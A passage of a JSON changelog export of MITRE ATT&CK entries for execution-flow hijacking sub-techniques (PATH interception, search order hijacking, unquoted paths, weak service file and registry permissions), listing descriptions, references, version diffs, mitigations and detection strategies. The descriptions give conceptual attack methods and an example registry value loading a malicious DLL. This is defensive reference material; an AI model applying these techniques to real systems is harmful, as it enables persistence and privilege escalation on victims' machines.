                            "external_id": "T1574.013"
                        },
                        {
                            "source_name": "FinFisher exposed ",
                            "description": "Microsoft Defender Security Research Team. (2018, March 1). FinFisher exposed: A researcher\u2019s tale of defeating traps, tricks, and complex virtual machines. Retrieved January 27, 2022.",
                            "url": "https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/"
                        },
                        {
                            "source_name": "NtQueryInformationProcess",
                            "description": "Microsoft. (2021, November 23). NtQueryInformationProcess function (winternl.h). Retrieved February 4, 2022.",
                            "url": "https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess"
                        },
                        {
                            "source_name": "Windows Process Injection KernelCallbackTable",
                            "description": "odzhan. (2019, May 25). Windows Process Injection: KernelCallbackTable used by FinFisher / FinSpy. Retrieved February 4, 2022.",
                            "url": "https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/"
                        },
                        {
                            "source_name": "Lazarus APT January 2022",
                            "description": "Saini, A. and Hossein, J. (2022, January 27). North Korea\u2019s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022.",
                            "url": "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 23:01:58.951000+00:00\", \"old_value\": \"2025-10-24 17:49:11.077000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}, \"root['kill_chain_phases'][1]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"privilege-escalation\"}}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"persistence\"}}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][2]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0577: Detection Strategy for Hijack Execution Flow through the KernelCallbackTable on Windows."
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-13 14:10:43.424000+00:00",
                    "modified": "2026-04-15 23:01:52.753000+00:00",
                    "name": "Path Interception by PATH Environment Variable",
                    "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. \n\nAdversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.\n\nFor example, on Windows if an adversary places a malicious program named \"net.exe\" in `C:\\example path`, which by default precedes `C:\\Windows\\system32\\net.exe` in the PATH environment variable, when \"net\" is executed from the command-line the `C:\\example path` will be called instead of the system's legitimate executable at `C:\\Windows\\system32\\net.exe`. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: ExpressVPN PATH env Windows 2021)\n\nAdversaries may also directly modify the $PATH variable specifying the directories to be searched.  An adversary can modify the `$PATH` variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or modifying the `/etc/paths.d` folder contents.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1574/007",
                            "external_id": "T1574.007"
                        },
                        {
                            "source_name": "Elastic Rules macOS launchctl 2022",
                            "description": "Elastic Security 7.17. (2022, February 1). Modification of Environment Variable via Launchctl. Retrieved September 28, 2023.",
                            "url": "https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variable-via-launchctl.html"
                        },
                        {
                            "source_name": "ExpressVPN PATH env Windows 2021",
                            "description": "ExpressVPN Security Team. (2021, November 16). Cybersecurity lessons: A PATH vulnerability in Windows. Retrieved September 28, 2023.",
                            "url": "https://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/"
                        },
                        {
                            "source_name": "uptycs Fake POC linux malware 2023",
                            "description": "Nischay Hegde and Siddartha Malladi. (2023, July 12). PoC Exploit: Fake Proof of Concept with Backdoor Malware. Retrieved September 28, 2023.",
                            "url": "https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware"
                        },
                        {
                            "source_name": "nixCraft macOS PATH variables",
                            "description": "Vivek Gite. (2023, August 22). MacOS \u2013 Set / Change $PATH Variable Command. Retrieved September 28, 2023.",
                            "url": "https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Stefan Kanthak"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 23:01:52.753000+00:00\", \"old_value\": \"2025-10-24 17:48:22.736000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}, \"root['kill_chain_phases'][1]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"privilege-escalation\"}}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"persistence\"}}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][2]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1038: Execution Prevention",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0004: Detection Strategy for Hijack Execution Flow using Path Interception by PATH Environment Variable."
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-13 17:48:58.999000+00:00",
                    "modified": "2026-04-15 23:01:48.263000+00:00",
                    "name": "Path Interception by Search Order Hijacking",
                    "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\n\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking, the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument <code>net user</code>. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then <code>cmd.exe /C net user</code> will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL](https://attack.mitre.org/techniques/T1574/001).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1574/008",
                            "external_id": "T1574.008"
                        },
                        {
                            "source_name": "Microsoft Environment Property",
                            "description": "Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016.",
                            "url": "https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN"
                        },
                        {
                            "source_name": "Microsoft CreateProcess",
                            "description": "Microsoft. (n.d.). CreateProcess function. Retrieved September 12, 2024.",
                            "url": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa"
                        },
                        {
                            "source_name": "Microsoft WinExec",
                            "description": "Microsoft. (n.d.). WinExec function. Retrieved September 12, 2024.",
                            "url": "https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec"
                        },
                        {
                            "source_name": "Windows NT Command Shell",
                            "description": "Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved December 5, 2014.",
                            "url": "https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Stefan Kanthak"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 23:01:48.263000+00:00\", \"old_value\": \"2025-10-24 17:48:49.665000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}, \"root['kill_chain_phases'][1]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"privilege-escalation\"}}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"persistence\"}}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][2]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1038: Execution Prevention",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0564: Detection Strategy for Hijack Execution Flow using Path Interception by Search Order Hijacking"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-13 13:51:58.519000+00:00",
                    "modified": "2026-04-15 23:01:45.477000+00:00",
                    "name": "Path Interception by Unquoted Path",
                    "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n\nService paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., <code>C:\\unsafe path with space\\program.exe</code> vs. <code>\"C:\\safe path with space\\program.exe\"</code>). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is <code>C:\\program files\\myapp.exe</code>, an adversary may create a program at <code>C:\\program.exe</code> that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)\n\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1574/009",
                            "external_id": "T1574.009"
                        },
                        {
                            "source_name": "Windows Privilege Escalation Guide",
                            "description": "absolomb. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018.",
                            "url": "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/"
                        },
                        {
                            "source_name": "Windows Unquoted Services",
                            "description": "HackHappy. (2018, April 23). Windows Privilege Escalation \u2013 Unquoted Services. Retrieved August 10, 2018.",
                            "url": "https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/"
                        },
                        {
                            "source_name": "Help eliminate unquoted path",
                            "description": "Mark Baggett. (2012, November 8). Help eliminate unquoted path vulnerabilities. Retrieved November 8, 2012.",
                            "url": "https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464"
                        },
                        {
                            "source_name": "Microsoft CurrentControlSet Services",
                            "description": "Microsoft. (2017, April 20). HKLM\\SYSTEM\\CurrentControlSet\\Services Registry Tree. Retrieved March 16, 2020.",
                            "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Stefan Kanthak"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 23:01:45.477000+00:00\", \"old_value\": \"2025-10-24 17:49:19.228000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}, \"root['kill_chain_phases'][1]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"privilege-escalation\"}}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"persistence\"}}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][2]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1038: Execution Prevention",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0064: Detection Strategy for Hijack Execution Flow through Path Interception by Unquoted Path"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-12 20:43:53.998000+00:00",
                    "modified": "2026-04-15 23:02:37.539000+00:00",
                    "name": "Services File Permissions Weakness",
                    "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1574/010",
                            "external_id": "T1574.010"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Stefan Kanthak",
                        "Travis Smith, Tripwire"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 23:02:37.539000+00:00\", \"old_value\": \"2025-10-24 17:49:09.575000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}, \"root['kill_chain_phases'][1]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"privilege-escalation\"}}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"persistence\"}}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][2]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1047: Audit",
                            "M1052: User Account Control"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0436: Detection Strategy for Hijack Execution Flow through Services File Permissions Weakness."
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-13 11:42:14.444000+00:00",
                    "modified": "2026-04-15 23:02:58.258000+00:00",
                    "name": "Services Registry Permissions Weakness",
                    "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Flaws in the permissions for Registry keys related to services can allow adversaries to redirect the originally specified executable to one they control, launching their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\\SYSTEM\\CurrentControlSet\\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter other Registry keys in the service\u2019s Registry tree. For example, the <code>FailureCommand</code> key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)\n\nThe <code>Performance</code> key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the <code>Performance</code> key is not already present and if an adversary-controlled user has the <code>Create Subkey</code> permission, adversaries may create the <code>Performance</code> key in the service\u2019s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)\n\nAdversaries may also add the <code>Parameters</code> key, which can reference malicious drivers file paths. This technique has been identified to be a method of abuse by configuring DLL file paths within the <code>Parameters</code> key of a given services registry configuration. By placing and configuring the <code>Parameters</code> key to reference a malicious DLL, adversaries can ensure that their code is loaded persistently whenever the associated service or library is invoked.\n\nFor example, the registry path(Citation: MDSec) <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\WinSock2\\Parameters</code>(Citation: hexacorn)(Citation: gendigital) contains the <code>AutodiaDLL</code> value, which specifies the DLL to be loaded for autodial funcitionality. An adversary could set the <code>AutodiaDLL</code> to point to a hijacked or malicious DLL:\n\n<code>\"AutodialDLL\"=\"c:\\temp\\foo.dll\"</code>\n\nThis ensures persistence, as it causes the DLL (in this case, foo.dll) to be loaded each time the Winsock 2 library is invoked.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1574/011",
                            "external_id": "T1574.011"
                        },
                        {
                            "source_name": "Tweet Registry Perms Weakness",
                            "description": "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved September 12, 2024.",
                            "url": "https://x.com/r0wdy_/status/936365549553991680"
                        },
                        {
                            "source_name": "insecure_reg_perms",
                            "description": "Cl\u00e9ment Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021.",
                            "url": "https://itm4n.github.io/windows-registry-rpceptmapper-eop/"
                        },
                        {
                            "source_name": "hexacorn",
                            "description": "hexacorn. (2015, January 13). Beyond good ol\u2019 Run key, Part 24. Retrieved September 25, 2025.",
                            "url": "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/"
                        },
                        {
                            "source_name": "Kansa Service related collectors",
                            "description": "Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.",
                            "url": "https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html"
                        },
                        {
                            "source_name": "malware_hides_service",
                            "description": "Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021.",
                            "url": "https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/"
                        },
                        {
                            "source_name": "MDSec",
                            "description": "MDSec. (n.d.). Autodial(DLL)ing Your Way. Retrieved September 25, 2025.",
                            "url": "https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/"
                        },
                        {
                            "source_name": "Registry Key Security",
                            "description": "Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017.",
                            "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN"
                        },
                        {
                            "source_name": "microsoft_services_registry_tree",
                            "description": "Microsoft. (2021, August 5). HKLM\\SYSTEM\\CurrentControlSet\\Services Registry Tree. Retrieved August 25, 2021.",
                            "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree"
                        },
                        {
                            "source_name": "gendigital",
                            "description": "Threat Research Team. (2022, March 22). Operation Dragon Castling: APT group targeting betting companies. Retrieved September 25, 2025.",
                            "url": "https://www.gendigital.com/blog/insights/research/operation-dragon-castling-apt-group-targeting-betting-companies"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Joe Gumke, U.S. Bank",
                        "Matthew Demaske, Adaptforward",
                        "Travis Smith, Tripwire"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.0",
